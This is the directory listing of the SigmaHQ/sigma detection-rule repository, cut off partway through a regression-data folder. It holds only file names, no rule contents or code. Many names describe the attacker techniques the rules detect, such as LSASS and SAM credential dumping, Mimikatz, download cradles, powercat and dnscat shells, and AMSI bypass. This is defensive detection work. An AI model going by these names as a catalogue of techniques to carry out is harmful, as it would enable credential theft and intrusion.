Repository: SigmaHQ/sigma Branch: master Commit: a15dbdaa057a Files: 4472 Total size: 6.8 MB Directory structure: gitextract_6lfx6dd0/ ├── .gitattributes ├── .github/ │ ├── FUNDING.yml │ ├── ISSUE_TEMPLATE/ │ │ ├── false_positive_report.yml │ │ └── rule_proposal.md │ ├── PULL_REQUEST_TEMPLATE.md │ ├── labeler.yml │ ├── latest_archiver_output.md │ └── workflows/ │ ├── goodlog-tests.yml │ ├── greetings.yml │ ├── known-FPs.csv │ ├── matchgrep.sh │ ├── pr-labeler.yml │ ├── ref-archiver.yml │ ├── regression-tests.yml │ ├── release.yml │ ├── sigma-rule-deprecated.yml │ ├── sigma-rule-promoter.yml │ ├── sigma-test.yml │ ├── sigma-validation.yml │ └── update-heatmap.yml ├── .gitignore ├── .yamllint ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── Releases.md ├── deprecated/ │ ├── README.md │ ├── cloud/ │ │ ├── azure_app_credential_modification.yml │ │ └── azure_app_permissions_for_api.yml │ ├── deprecated.csv │ ├── deprecated.json │ ├── linux/ │ │ ├── lnx_auditd_alter_bash_profile.yml │ │ ├── lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml │ │ └── lnx_space_after_filename_.yml │ ├── macos/ │ │ ├── proc_creation_macos_add_to_admin_group.yml │ │ └── proc_creation_macos_malware_amos_filegrabber_exec.yml │ ├── other/ │ │ └── generic_brute_force.yml │ ├── web/ │ │ ├── proxy_apt_domestic_kitten.yml │ │ ├── proxy_cobalt_amazon.yml │ │ ├── proxy_cobalt_malformed_uas.yml │ │ ├── proxy_cobalt_ocsp.yml │ │ ├── proxy_cobalt_onedrive.yml │ │ ├── proxy_ios_implant.yml │ │ └── proxy_webdav_search_ms.yml │ └── windows/ │ ├── create_remote_thread_win_susp_remote_thread_target.yml │ ├── driver_load_win_mal_creddumper.yml │ ├── driver_load_win_mal_poortry_driver.yml │ ├── driver_load_win_powershell_script_installed_as_service.yml │ ├── driver_load_win_vuln_avast_anti_rootkit_driver.yml │ ├── driver_load_win_vuln_dell_driver.yml │ ├── driver_load_win_vuln_drivers_names.yml │ ├── driver_load_win_vuln_gigabyte_driver.yml │ ├── driver_load_win_vuln_hw_driver.yml │ ├── 
driver_load_win_vuln_lenovo_driver.yml │ ├── file_event_win_access_susp_teams.yml │ ├── file_event_win_access_susp_unattend_xml.yml │ ├── file_event_win_crackmapexec_patterns.yml │ ├── file_event_win_hktl_createminidump.yml │ ├── file_event_win_lsass_memory_dump_file_creation.yml │ ├── file_event_win_mimikatz_memssp_log_file.yml │ ├── file_event_win_office_outlook_rdp_file_creation.yml │ ├── file_event_win_susp_clr_logs.yml │ ├── image_load_alternate_powershell_hosts_moduleload.yml │ ├── image_load_office_dsparse_dll_load.yml │ ├── image_load_office_kerberos_dll_load.yml │ ├── image_load_side_load_advapi32.yml │ ├── image_load_side_load_scm.yml │ ├── image_load_side_load_svchost_dlls.yml │ ├── image_load_susp_uncommon_image_load.yml │ ├── image_load_susp_winword_wmidll_load.yml │ ├── net_connection_win_binary_github_com.yml │ ├── net_connection_win_reddit_api_non_browser_access.yml │ ├── net_connection_win_susp_epmap.yml │ ├── pipe_created_psexec_pipes_artifacts.yml │ ├── posh_pm_powercat.yml │ ├── posh_ps_access_to_chrome_login_data.yml │ ├── posh_ps_azurehound_commands.yml │ ├── posh_ps_cl_invocation_lolscript.yml │ ├── posh_ps_cl_mutexverifiers_lolscript.yml │ ├── posh_ps_dnscat_execution.yml │ ├── posh_ps_exchange_mailbox_smpt_forwarding_rule.yml │ ├── posh_ps_file_and_directory_discovery.yml │ ├── posh_ps_invoke_nightmare.yml │ ├── posh_ps_susp_gwmi.yml │ ├── powershell_ps_susp_win32_shadowcopy.yml │ ├── powershell_suspicious_download.yml │ ├── powershell_suspicious_invocation_generic.yml │ ├── powershell_suspicious_invocation_specific.yml │ ├── powershell_syncappvpublishingserver_exe.yml │ ├── proc_access_win_in_memory_assembly_execution.yml │ ├── proc_access_win_lazagne_cred_dump_lsass_access.yml │ ├── proc_access_win_lsass_susp_access.yml │ ├── proc_access_win_pypykatz_cred_dump_lsass_access.yml │ ├── proc_access_win_susp_invoke_patchingapi.yml │ ├── proc_creation_win_apt_apt29_thinktanks.yml │ ├── proc_creation_win_apt_dragonfly.yml │ ├── 
proc_creation_win_apt_gallium.yml │ ├── proc_creation_win_apt_hurricane_panda.yml │ ├── proc_creation_win_apt_lazarus_activity_apr21.yml │ ├── proc_creation_win_apt_lazarus_loader.yml │ ├── proc_creation_win_apt_muddywater_dnstunnel.yml │ ├── proc_creation_win_apt_ta505_dropper.yml │ ├── proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml │ ├── proc_creation_win_certutil_susp_execution.yml │ ├── proc_creation_win_cmd_read_contents.yml │ ├── proc_creation_win_cmd_redirect_to_stream.yml │ ├── proc_creation_win_credential_acquisition_registry_hive_dumping.yml │ ├── proc_creation_win_cscript_vbs.yml │ ├── proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml │ ├── proc_creation_win_filefix_browsers.yml │ ├── proc_creation_win_indirect_cmd.yml │ ├── proc_creation_win_indirect_command_execution_forfiles.yml │ ├── proc_creation_win_invoke_obfuscation_via_rundll.yml │ ├── proc_creation_win_invoke_obfuscation_via_use_rundll32.yml │ ├── proc_creation_win_lolbas_execution_of_wuauclt.yml │ ├── proc_creation_win_lolbin_findstr.yml │ ├── proc_creation_win_lolbin_office.yml │ ├── proc_creation_win_lolbin_rdrleakdiag.yml │ ├── proc_creation_win_lolbins_by_office_applications.yml │ ├── proc_creation_win_mal_ryuk.yml │ ├── proc_creation_win_malware_trickbot_recon_activity.yml │ ├── proc_creation_win_mavinject_proc_inj.yml │ ├── proc_creation_win_msdt_diagcab.yml │ ├── proc_creation_win_new_service_creation.yml │ ├── proc_creation_win_nslookup_pwsh_download_cradle.yml │ ├── proc_creation_win_odbcconf_susp_exec.yml │ ├── proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml │ ├── proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml │ ├── proc_creation_win_office_spawning_wmi_commandline.yml │ ├── proc_creation_win_possible_applocker_bypass.yml │ ├── proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml │ ├── proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml │ ├── 
proc_creation_win_powershell_base64_listing_shadowcopy.yml │ ├── proc_creation_win_powershell_base64_shellcode.yml │ ├── proc_creation_win_powershell_bitsjob.yml │ ├── proc_creation_win_powershell_download_cradles.yml │ ├── proc_creation_win_powershell_service_modification.yml │ ├── proc_creation_win_powershell_susp_ps_downloadfile.yml │ ├── proc_creation_win_powershell_xor_encoded_command.yml │ ├── proc_creation_win_reg_dump_sam.yml │ ├── proc_creation_win_regsvr32_anomalies.yml │ ├── proc_creation_win_renamed_paexec.yml │ ├── proc_creation_win_renamed_powershell.yml │ ├── proc_creation_win_renamed_psexec.yml │ ├── proc_creation_win_renamed_rundll32.yml │ ├── proc_creation_win_root_certificate_installed.yml │ ├── proc_creation_win_run_from_zip.yml │ ├── proc_creation_win_rundll32_js_runhtmlapplication.yml │ ├── proc_creation_win_rundll32_script_run.yml │ ├── proc_creation_win_sc_delete_av_services.yml │ ├── proc_creation_win_schtasks_user_temp.yml │ ├── proc_creation_win_service_stop.yml │ ├── proc_creation_win_susp_bitstransfer.yml │ ├── proc_creation_win_susp_cmd_exectution_via_wmi.yml │ ├── proc_creation_win_susp_commandline_chars.yml │ ├── proc_creation_win_susp_lolbin_non_c_drive.yml │ ├── proc_creation_win_susp_run_folder.yml │ ├── proc_creation_win_susp_squirrel_lolbin.yml │ ├── proc_creation_win_sysinternals_psexec_service_execution.yml │ ├── proc_creation_win_sysinternals_psexesvc_start.yml │ ├── proc_creation_win_whoami_as_system.yml │ ├── proc_creation_win_whoami_execution.yml │ ├── proc_creation_win_winword_dll_load.yml │ ├── proc_creation_win_wmic_execution_via_office_process.yml │ ├── proc_creation_win_wmic_remote_command.yml │ ├── proc_creation_win_wmic_remote_service.yml │ ├── proc_creation_win_wuauclt_execution.yml │ ├── process_creation_syncappvpublishingserver_exe.yml │ ├── registry_add_sysinternals_sdelete_registry_keys.yml │ ├── registry_event_asep_reg_keys_modification.yml │ ├── registry_set_abusing_windows_telemetry_for_persistence.yml │ ├── 
registry_set_add_hidden_user.yml │ ├── registry_set_creation_service_uncommon_folder.yml │ ├── registry_set_disable_microsoft_office_security_features.yml │ ├── registry_set_malware_adwind.yml │ ├── registry_set_office_security.yml │ ├── registry_set_persistence_com_hijacking_susp_locations.yml │ ├── registry_set_persistence_search_order.yml │ ├── registry_set_silentprocessexit.yml │ ├── sysmon_accessing_winapi_in_powershell_credentials_dumping.yml │ ├── sysmon_dcom_iertutil_dll_hijack.yml │ ├── sysmon_mimikatz_detection_lsass.yml │ ├── sysmon_powershell_execution_moduleload.yml │ ├── sysmon_rclone_execution.yml │ ├── win_defender_disabled.yml │ ├── win_dsquery_domain_trust_discovery.yml │ ├── win_lateral_movement_condrv.yml │ ├── win_security_event_log_cleared.yml │ ├── win_security_group_modification_logging.yml │ ├── win_security_lolbas_execution_of_nltest.yml │ ├── win_security_windows_defender_exclusions_write_deleted.yml │ ├── win_susp_esentutl_activity.yml │ ├── win_susp_rclone_exec.yml │ ├── win_susp_vssadmin_ntds_activity.yml │ ├── win_system_service_install_susp_double_ampersand.yml │ └── win_system_susp_sam_dump.yml ├── documentation/ │ ├── README.md │ ├── logsource-guides/ │ │ ├── other/ │ │ │ └── antivirus.md │ │ └── windows/ │ │ ├── category/ │ │ │ ├── process_creation.md │ │ │ ├── ps_module.md │ │ │ ├── ps_script.md │ │ │ ├── registry_add.md │ │ │ ├── registry_delete.md │ │ │ ├── registry_event.md │ │ │ ├── registry_rename.md │ │ │ └── registry_set.md │ │ └── service/ │ │ ├── powershell.md │ │ └── security.md │ └── tools/ │ └── sigma-logsource-checker.py ├── other/ │ ├── godmode_sigma_rule.yml │ └── sigma_attack_nav_coverage.json ├── regression_data/ │ ├── rules/ │ │ └── windows/ │ │ ├── file/ │ │ │ └── file_event/ │ │ │ ├── file_event_win_advanced_ip_scanner/ │ │ │ │ ├── fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx │ │ │ │ ├── fed85bf9-e075-4280-9159-fbe8a023d6fa.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_anydesk_artefact/ │ │ │ │ ├── 
0b9ad457-2554-44c1-82c2-d56a99c42377.evtx │ │ │ │ ├── 0b9ad457-2554-44c1-82c2-d56a99c42377.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_create_evtx_non_common_locations/ │ │ │ │ ├── 65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx │ │ │ │ ├── 65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_create_non_existent_dlls/ │ │ │ │ ├── df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx │ │ │ │ ├── df6ecb8b-7822-4f4b-b412-08f524b4576c.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_creation_new_shim_database/ │ │ │ │ ├── ee63c85c-6d51-4d12-ad09-04e25877a947.evtx │ │ │ │ ├── ee63c85c-6d51-4d12-ad09-04e25877a947.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_creation_system_dll_files/ │ │ │ │ ├── 13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx │ │ │ │ ├── 13c02350-4177-4e45-ac17-cf7ca628ff5e.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_creation_system_file/ │ │ │ │ ├── d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx │ │ │ │ ├── d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_cred_dump_tools_dropped_files/ │ │ │ │ ├── 8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx │ │ │ │ ├── 8fbf3271-1ef6-4e94-8210-03c2317947f6.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_dump_file_susp_creation/ │ │ │ │ ├── aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx │ │ │ │ ├── aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_susp_legitimate_app_dropping_in_uncommon_location/ │ │ │ │ ├── 1cf465a1-2609-4c15-9b66-c32dbe4bfd67.evtx │ │ │ │ ├── 1cf465a1-2609-4c15-9b66-c32dbe4bfd67.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_susp_lnk_double_extension/ │ │ │ │ ├── 3215aa19-f060-4332-86d5-5602511f3ca8.evtx │ │ │ │ ├── 3215aa19-f060-4332-86d5-5602511f3ca8.json │ │ │ │ └── info.yml │ │ │ ├── file_event_win_susp_public_folder_extension/ │ │ │ │ ├── b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx │ │ │ │ ├── b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json │ │ │ │ └── info.yml │ │ │ ├── 
file_event_win_susp_recycle_bin_fake_exec/ │ │ │ │ ├── cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx │ │ │ │ ├── cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json │ │ │ │ └── info.yml │ │ │ └── file_event_win_taskmgr_lsass_dump/ │ │ │ ├── 69ca12af-119d-44ed-b50f-a47af0ebc364.evtx │ │ │ ├── 69ca12af-119d-44ed-b50f-a47af0ebc364.json │ │ │ └── info.yml │ │ ├── image_load/ │ │ │ ├── image_load_side_load_cpl_from_non_system_location/ │ │ │ │ ├── 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.evtx │ │ │ │ ├── 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.json │ │ │ │ └── info.yml │ │ │ └── image_load_win_susp_dbgcore_dbghelp_load/ │ │ │ ├── 416bc4a2-7217-4519-8dc7-c3271817f1d5.evtx │ │ │ ├── 416bc4a2-7217-4519-8dc7-c3271817f1d5.json │ │ │ └── info.yml │ │ ├── process_access/ │ │ │ ├── proc_access_win_susp_dbgcore_dbghelp_load/ │ │ │ │ ├── 9f5c1d59-33be-4e60-bcab-85d2f566effd.evtx │ │ │ │ ├── 9f5c1d59-33be-4e60-bcab-85d2f566effd.json │ │ │ │ └── info.yml │ │ │ └── proc_access_win_werfaultsecure_msmpeng_access/ │ │ │ ├── 387df17d-3b04-448f-8669-9e7fd5e5fd8c.evtx │ │ │ ├── 387df17d-3b04-448f-8669-9e7fd5e5fd8c.json │ │ │ └── info.yml │ │ ├── process_creation/ │ │ │ ├── proc_creation_win_amsi_registry_tampering/ │ │ │ │ ├── 7dbbcac2-57a0-45ac-b306-ff30a8bd2981.evtx │ │ │ │ ├── 7dbbcac2-57a0-45ac-b306-ff30a8bd2981.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_bitsadmin_download/ │ │ │ │ ├── d059842b-6b9d-4ed1-b5c3-5b89143c6ede.evtx │ │ │ │ ├── d059842b-6b9d-4ed1-b5c3-5b89143c6ede.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_bitsadmin_download_direct_ip/ │ │ │ │ ├── 99c840f2-2012-46fd-9141-c761987550ef.evtx │ │ │ │ ├── 99c840f2-2012-46fd-9141-c761987550ef.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_bitsadmin_download_file_sharing_domains/ │ │ │ │ ├── 8518ed3d-f7c9-4601-a26c-f361a4256a0c.evtx │ │ │ │ ├── 8518ed3d-f7c9-4601-a26c-f361a4256a0c.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_bitsadmin_download_susp_extensions/ │ │ │ │ ├── 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.evtx 
│ │ │ │ ├── 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_bitsadmin_download_susp_targetfolder/ │ │ │ │ ├── 2ddef153-167b-4e89-86b6-757a9e65dcac.evtx │ │ │ │ ├── 2ddef153-167b-4e89-86b6-757a9e65dcac.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_browsers_chromium_headless_file_download/ │ │ │ │ ├── 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx │ │ │ │ ├── 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_browsers_chromium_load_extension/ │ │ │ │ ├── 88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx │ │ │ │ ├── 88d6e60c-759d-4ac1-a447-c0f1466c2d21.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_browsers_chromium_mockbin_abuse/ │ │ │ │ ├── 1c526788-0abe-4713-862f-b520da5e5316.evtx │ │ │ │ ├── 1c526788-0abe-4713-862f-b520da5e5316.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_browsers_chromium_susp_load_extension/ │ │ │ │ ├── 27ba3207-dd30-4812-abbf-5d20c57d474e.evtx │ │ │ │ ├── 27ba3207-dd30-4812-abbf-5d20c57d474e.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_browsers_inline_file_download/ │ │ │ │ ├── 94771a71-ba41-4b6e-a757-b531372eaab6.evtx │ │ │ │ ├── 94771a71-ba41-4b6e-a757-b531372eaab6.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_browsers_tor_execution/ │ │ │ │ ├── 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx │ │ │ │ ├── 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_certificate_installation/ │ │ │ │ ├── d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx │ │ │ │ ├── d2125259-ddea-4c1c-9c22-977eb5b29cf0.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_decode/ │ │ │ │ ├── cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx │ │ │ │ ├── cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_download/ │ │ │ │ ├── 19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx │ │ │ │ ├── 19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json │ │ │ │ └── info.yml │ │ │ ├── 
proc_creation_win_certutil_download_direct_ip/ │ │ │ │ ├── 13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx │ │ │ │ ├── 13e6fe51-d478-4c7e-b0f2-6da9b400a829.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_download_file_sharing_domains/ │ │ │ │ ├── 42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx │ │ │ │ ├── 42a5f1e7-9603-4f6d-97ae-3f37d130d794.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_encode/ │ │ │ │ ├── e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx │ │ │ │ ├── e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_encode_susp_extensions/ │ │ │ │ ├── ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx │ │ │ │ ├── ea0cdc3e-2239-4f26-a947-4e8f8224e464.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_encode_susp_location/ │ │ │ │ ├── 82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx │ │ │ │ ├── 82a6714f-4899-4f16-9c1e-9a333544d4c3.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_export_pfx/ │ │ │ │ ├── 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx │ │ │ │ ├── 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_certutil_ntlm_coercion/ │ │ │ │ ├── 6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx │ │ │ │ ├── 6c6d9280-e6d0-4b9d-80ac-254701b64916.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_chcp_codepage_lookup/ │ │ │ │ ├── 7090adee-82e2-4269-bd59-80691e7c6338.evtx │ │ │ │ ├── 7090adee-82e2-4269-bd59-80691e7c6338.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_chcp_codepage_switch/ │ │ │ │ ├── c7942406-33dd-4377-a564-0f62db0593a3.evtx │ │ │ │ ├── c7942406-33dd-4377-a564-0f62db0593a3.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cipher_overwrite_deleted_data/ │ │ │ │ ├── 4b046706-5789-4673-b111-66f25fe99534.evtx │ │ │ │ ├── 4b046706-5789-4673-b111-66f25fe99534.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_clip_execution/ │ │ │ │ ├── ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx │ │ │ │ ├── ddeff553-5233-4ae9-bbab-d64d2bd634be.json │ │ │ │ └── 
info.yml │ │ │ ├── proc_creation_win_cmd_assoc_execution/ │ │ │ │ ├── 3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx │ │ │ │ ├── 3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cmd_dir_execution/ │ │ │ │ ├── 7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx │ │ │ │ ├── 7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cmd_launched_with_hidden_start_flag/ │ │ │ │ ├── 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.evtx │ │ │ │ ├── 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cmd_mklink_osk_cmd/ │ │ │ │ ├── e9b61244-893f-427c-b287-3e708f321c6b.evtx │ │ │ │ ├── e9b61244-893f-427c-b287-3e708f321c6b.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cmd_rmdir_execution/ │ │ │ │ ├── 41ca393d-538c-408a-ac27-cf1e038be80c.evtx │ │ │ │ ├── 41ca393d-538c-408a-ac27-cf1e038be80c.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cmdkey_adding_generic_creds/ │ │ │ │ ├── b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx │ │ │ │ ├── b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_cmdkey_recon/ │ │ │ │ ├── 07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx │ │ │ │ ├── 07f8bdc2-c9b3-472a-9817-5a670b872f53.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_conhost_headless_powershell/ │ │ │ │ ├── 056c7317-9a09-4bd4-9067-d051312752ea.evtx │ │ │ │ ├── 056c7317-9a09-4bd4-9067-d051312752ea.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_credential_guard_registry_tampering/ │ │ │ │ ├── c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.evtx │ │ │ │ ├── c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_cookie_hijacking/ │ │ │ │ ├── 5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx │ │ │ │ ├── 5a6e1e16-07de-48d8-8aae-faa766c05e88.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_custom_user_agent/ │ │ │ │ ├── 85de1f22-d189-44e4-8239-dc276b45379b.evtx │ │ │ │ ├── 85de1f22-d189-44e4-8239-dc276b45379b.json │ │ │ │ 
└── info.yml │ │ │ ├── proc_creation_win_curl_download_direct_ip_exec/ │ │ │ │ ├── 9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx │ │ │ │ ├── 9cc85849-3b02-4cb5-b371-3a1ff54f2218.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_download_direct_ip_susp_extensions/ │ │ │ │ ├── 5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx │ │ │ │ ├── 5cb299fc-5fb1-4d07-b989-0644c68b6043.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_download_susp_file_sharing_domains/ │ │ │ │ ├── 56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx │ │ │ │ ├── 56454143-524f-49fb-b1c6-3fb8b1ad41fb.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_insecure_connection/ │ │ │ │ ├── cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx │ │ │ │ ├── cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_insecure_proxy_or_doh/ │ │ │ │ ├── 2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx │ │ │ │ ├── 2c1486f5-02e8-4f86-9099-b97f2da4ed77.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_local_file_read/ │ │ │ │ ├── aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx │ │ │ │ ├── aa6f6ea6-0676-40dd-b510-6e46f02d8867.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_curl_susp_download/ │ │ │ │ ├── e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx │ │ │ │ ├── e218595b-bbe7-4ee5-8a96-f32a24ad3468.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_devcon_disable_vmci_driver/ │ │ │ │ ├── 85f520e7-6f5e-43ca-874c-222e5bf9c0de.evtx │ │ │ │ ├── 85f520e7-6f5e-43ca-874c-222e5bf9c0de.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_dirlister_execution/ │ │ │ │ ├── b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx │ │ │ │ ├── b4dc61f5-6cce-468e-a608-b48b469feaa2.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_discovery_via_reg_queries/ │ │ │ │ ├── 0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx │ │ │ │ ├── 0022869c-49f7-4ff2-ba03-85ac42ddac58.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_dism_remove/ │ │ │ │ ├── 43e32da2-fdd0-4156-90de-50dfd62636f9.evtx │ │ │ │ ├── 
43e32da2-fdd0-4156-90de-50dfd62636f9.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_driverquery_recon/ │ │ │ │ ├── 9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx │ │ │ │ ├── 9fc3072c-dc8f-4bf7-b231-18950000fadd.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_driverquery_usage/ │ │ │ │ ├── a20def93-0709-4eae-9bd2-31206e21e6b2.evtx │ │ │ │ ├── a20def93-0709-4eae-9bd2-31206e21e6b2.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_dsquery_domain_trust_discovery/ │ │ │ │ ├── 3bad990e-4848-4a78-9530-b427d854aac0.evtx │ │ │ │ ├── 3bad990e-4848-4a78-9530-b427d854aac0.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_dtrace_kernel_dump/ │ │ │ │ ├── 7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx │ │ │ │ ├── 7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_explorer_folder_shortcut_via_shell_binary/ │ │ │ │ ├── c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx │ │ │ │ ├── c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_findstr_gpp_passwords/ │ │ │ │ ├── 91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx │ │ │ │ ├── 91a2c315-9ee6-4052-a853-6f6a8238f90d.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_findstr_lsass/ │ │ │ │ ├── fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx │ │ │ │ ├── fe63010f-8823-4864-a96b-a7b4a0f7b929.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_findstr_recon_everyone/ │ │ │ │ ├── 47e4bab7-c626-47dc-967b-255608c9a920.evtx │ │ │ │ ├── 47e4bab7-c626-47dc-967b-255608c9a920.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_findstr_recon_pipe_output/ │ │ │ │ ├── ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx │ │ │ │ ├── ccb5742c-c248-4982-8c5c-5571b9275ad3.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_findstr_security_keyword_lookup/ │ │ │ │ ├── 4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx │ │ │ │ ├── 4fe074b4-b833-4081-8f24-7dcfeca72b42.json │ │ │ │ └── info.yml │ │ │ ├── proc_creation_win_finger_execution/ │ │ │ │ ├── af491bca-e752-4b44-9c86-df5680533dbc.evtx │ │ │ │ ├── 
